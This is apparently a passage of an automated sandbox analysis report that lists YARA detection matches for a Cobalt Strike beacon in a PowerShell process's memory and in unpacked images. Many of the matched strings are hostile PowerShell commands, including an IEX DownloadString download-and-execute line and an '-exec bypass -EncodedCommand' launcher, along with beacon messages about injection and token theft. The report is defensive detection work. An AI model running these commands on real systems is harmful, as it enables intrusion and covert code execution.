Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x318310:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x10c86b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x10c8d9:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x1adebf:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x1adf2d:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3182a2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x318310:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x10beaf:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1ad503:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3178e6:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Process Memory Space: powershell.exe PID: 2820	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x110f26:$loader_export: ReflectiveLoader 0x110f45:$loader_export: ReflectiveLoader 0x1b257a:$loader_export: ReflectiveLoader 0x1b2599:$loader_export: ReflectiveLoader 0x31c994:$loader_export: ReflectiveLoader 0x31c9b3:$loader_export: ReflectiveLoader 0x10bc0f:$exportname: beacon.dll 0x10bd98:$exportname: beacon.dll 0x1ad263:$exportname: beacon.dll 0x1ad3ec:$exportname: beacon.dll 0x317646:$exportname: beacon.dll 0x3177cf:$exportname: beacon.dll
Process Memory Space: powershell.exe PID: 2820	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x6d9:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x3f090:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0xbed:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x3f5a4:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0xcda:$s5: = [System.Convert]::FromBase64String( 0x3f691:$s5: = [System.Convert]::FromBase64String( 0x943:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x3f2fa:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0xb36:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, 0x3f4ed:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
Process Memory Space: powershell.exe PID: 2820	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x10c923:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x1adf77:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31835a:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x10c6fd:$x2: %d is an x86 process (can't inject x64 content) 0x1add51:$x2: %d is an x86 process (can't inject x64 content) 0x318134:$x2: %d is an x86 process (can't inject x64 content) 0x10c8d9:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x1adf2d:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x318310:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x10c9bd:$x4: Failed to impersonate token from %d (%u) 0x1ae011:$x4: Failed to impersonate token from %d (%u) 0x3183f4:$x4: Failed to impersonate token from %d (%u) 0x10ca14:$x5: Failed to impersonate logged on user %d (%u) 0x1ae068:$x5: Failed to impersonate logged on user %d (%u) 0x31844b:$x5: Failed to impersonate logged on user %d (%u) 0x10bdd4:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x1ad428:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780b:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Process Memory Space: powershell.exe PID: 2820	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xcec:$b2: ::FromBase64String( 0x3f6a3:$b2: ::FromBase64String( 0x9f6c:$s1: -join 0x9fa7:$s1: -join 0xa076:$s1: -join 0xa0a4:$s1: -join 0xa246:$s1: -join 0xa269:$s1: -join 0xa531:$s1: -join 0xa552:$s1: -join 0xa584:$s1: -join 0xa5cc:$s1: -join 0xa5f9:$s1: -join 0xa620:$s1: -join 0xa64b:$s1: -join 0xa667:$s1: -join 0xa6d0:$s1: -join 0xab95:$s1: -join 0xabb7:$s1: -join 0xac16:$s1: -join 0xac40:$s1: -join
Click to see the 44 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.powershell.exe.1a6ed330000.1.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed330000.1.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed330000.1.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x32d6a:$a11: Could not open service control manager on %s: %d 0x3329c:$a12: %d is an x64 process (can't inject x86 content) 0x332cc:$a13: %d is an x86 process (can't inject x64 content) 0x335ed:$a14: Failed to impersonate logged on user %d (%u) 0x33255:$a15: could not create remote thread in %d: %d 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x33203:$a17: could not write to process memory: %d 0x32d9b:$a18: Could not create service %s on %s: %d 0x32e24:$a19: Could not delete service %s on %s: %d 0x32c89:$a20: Could not open process token: %d (%u)
0.2.powershell.exe.1a6ed330000.1.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.powershell.exe.1a6ed330000.1.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.powershell.exe.1a6ed330000.1.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x334b2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x334fc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x3: %d is an x86 process (can't inject x64 content) 0x32c89:$s1: Could not open process token: %d (%u) 0x329a3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s4: Could not connect to pipe (%s): %d
0.2.powershell.exe.1a6ed330000.1.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x41bf1:$loader_export: ReflectiveLoader 0x32960:$exportname: beacon.dll
0.2.powershell.exe.1a6ed330000.1.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3329c:$x2: %d is an x64 process (can't inject x86 content) 0x335ed:$x3: Failed to impersonate logged on user %d (%u) 0x334fc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x334b2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x32c0f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x33203:$s4: could not write to process memory: %d 0x329a3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32d47:$s6: Could not connect to pipe (%s): %d
0.2.powershell.exe.1a6ed330000.1.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x33970:$str1: %s (admin) 0x32960:$str2: beacon.dll
0.2.powershell.exe.1a6ed330000.1.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x334fc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x332cc:$x2: %d is an x86 process (can't inject x64 content) 0x334b2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x33596:$x4: Failed to impersonate token from %d (%u) 0x335ed:$x5: Failed to impersonate logged on user %d (%u) 0x329a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.powershell.exe.1a6ed330000.1.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x3348a:$s1: %%IMPORT%% 0x32987:$s2: www6.%x%x.%s 0x3297b:$s3: cdn.%x%x.%s 0x32c03:$s4: api.%x%x.%s 0x33970:$s5: %s (admin) 0x32c72:$s6: could not spawn %s: %d 0x3352e:$s7: Could not kill %d: %d 0x32d47:$s8: Could not connect to pipe (%s): %d 0x32994:$s9: %s.1%x.%x%x.%s 0x329a3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a1b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32a7e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32ac4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b02:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x32b38:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b61:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x32b86:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x32ba7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x32bc4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x32bdd:$s9: %s.1%08x%08x.%x%x.%s 0x32bf2:$s9: %s.1%08x.%x%x.%s
0.2.powershell.exe.1a6ed330000.1.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed330000.1.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed330000.1.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
0.2.powershell.exe.1a6ed330000.1.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.powershell.exe.1a6ed330000.1.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.powershell.exe.1a6ed330000.1.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
0.2.powershell.exe.1a6ed330000.1.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
0.2.powershell.exe.1a6ed330000.1.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
0.2.powershell.exe.1a6ed330000.1.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
0.2.powershell.exe.1a6ed330000.1.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.powershell.exe.1a6ed330000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
0.2.powershell.exe.1a6ed330000.1.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	JoeSecurity_CobaltStrike_2	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x30fa3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31780:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x31ab2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31a44:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x31ab2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x3107e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3120f:$a7: could not run command (w/ token) because of its length of %d bytes! 0x310c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31afc:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x3136a:$a11: Could not open service control manager on %s: %d 0x3189c:$a12: %d is an x64 process (can't inject x86 content) 0x318cc:$a13: %d is an x86 process (can't inject x64 content) 0x31bed:$a14: Failed to impersonate logged on user %d (%u) 0x31855:$a15: could not create remote thread in %d: %d 0x31138:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31803:$a17: could not write to process memory: %d 0x3139b:$a18: Could not create service %s on %s: %d 0x31424:$a19: Could not delete service %s on %s: %d 0x31289:$a20: Could not open process token: %d (%u)
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1cd3c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x1896a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x19c9b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x31ab2:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31afc:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x3: %d is an x86 process (can't inject x64 content) 0x31289:$s1: Could not open process token: %d (%u) 0x30fa3:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s4: Could not connect to pipe (%s): %d
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x401f1:$loader_export: ReflectiveLoader 0x30f60:$exportname: beacon.dll
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x3189c:$x2: %d is an x64 process (can't inject x86 content) 0x31bed:$x3: Failed to impersonate logged on user %d (%u) 0x31afc:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x31ab2:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3120f:$s3: could not run command (w/ token) because of its length of %d bytes! 0x31803:$s4: could not write to process memory: %d 0x30fa3:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31347:$s6: Could not connect to pipe (%s): %d
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x31f70:$str1: %s (admin) 0x30f60:$str2: beacon.dll
0.2.powershell.exe.1a6ed2e0000.0.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed2e0000.0.unpack	JoeSecurity_CobaltStrike_4	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed2e0000.0.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x31afc:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x318cc:$x2: %d is an x86 process (can't inject x64 content) 0x31ab2:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x31b96:$x4: Failed to impersonate token from %d (%u) 0x31bed:$x5: Failed to impersonate logged on user %d (%u) 0x30fa3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen
0.2.powershell.exe.1a6ed2e0000.0.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x31a8a:$s1: %%IMPORT%% 0x30f87:$s2: www6.%x%x.%s 0x30f7b:$s3: cdn.%x%x.%s 0x31203:$s4: api.%x%x.%s 0x31f70:$s5: %s (admin) 0x31272:$s6: could not spawn %s: %d 0x31b2e:$s7: Could not kill %d: %d 0x31347:$s8: Could not connect to pipe (%s): %d 0x30f94:$s9: %s.1%x.%x%x.%s 0x30fa3:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3101b:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3107e:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x310c4:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31102:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x31138:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31161:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x31186:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x311a7:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x311c4:$s9: %s.1%08x%08x%08x.%x%x.%s 0x311dd:$s9: %s.1%08x%08x.%x%x.%s 0x311f2:$s9: %s.1%08x.%x%x.%s
0.2.powershell.exe.1a6ed2e0000.0.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x303a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3041b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x3047e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x304c4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30502:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x30538:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x30160:$a39: %s as %s\%s: %d 0x30394:$a40: %s.1%x.%x%x.%s 0x3e7e2:$a41: beacon.x64.dll 0x30387:$a43: www6.%x%x.%s 0x3037b:$a44: cdn.%x%x.%s 0x30360:$a47: beacon.dll 0x302d8:$a48: %s%s: %s 0x3018c:$a50: %02d/%02d/%02d %02d:%02d:%02d 0x301b8:$a50: %02d/%02d/%02d %02d:%02d:%02d
